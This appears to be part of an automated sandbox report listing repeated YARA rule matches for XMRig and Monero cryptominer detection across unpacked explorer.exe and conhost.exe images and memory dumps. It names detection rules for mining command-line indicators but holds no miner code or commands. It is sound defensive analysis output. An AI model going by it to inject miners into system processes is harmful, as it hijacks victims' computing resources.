Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 21.2.conhost.exe.224e882d2d0.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.20190d5ca00.10.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 28.0.explorer.exe.140000000.6.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 27.0.explorer.exe.140000000.11.raw.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 17.2.conhost.exe.2019125ca38.11.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.798724965.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000000.792450012.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.784200823.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.796296289.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001B.00000002.925771817.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.780903437.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
Source: 0000001C.00000000.774089554.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 0000001B.00000000.775205927.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
